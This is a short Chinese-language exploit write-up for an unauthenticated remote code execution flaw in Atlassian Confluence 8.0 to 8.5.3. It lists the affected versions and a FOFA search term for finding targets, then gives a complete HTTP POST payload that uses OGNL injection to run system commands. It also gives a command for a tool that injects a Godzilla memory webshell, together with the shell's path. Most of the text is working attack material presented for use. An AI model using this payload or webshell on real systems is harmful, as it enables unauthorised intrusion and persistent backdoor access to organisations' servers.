简介
Atlassian Confluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。攻击者可在无需登录的情况下,利用该漏洞构造恶意请求,导致远程代码执行。
影响版本
- 8.5.0 ~ 8.5.3
- 8.0.x ~ 8.4.x
FOFA
合流8.5.1
漏洞利用
POC数据包
POST /template/aui/text-inline.vm HTTP/1.1
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: 127.0.0.1
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 375
Connection: close
label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&[email protected]. struts2.ServletActionContext@getResponse().setHeader('Cmd-Responses-Header',(new freemarker.template.utility.Execute()).exec({"id"}))
执行id命令
内存注入
Github:https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL 运行jar包:
java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://xxxx/ a b
哥斯拉连接
shell位置:
/browsepeople.action
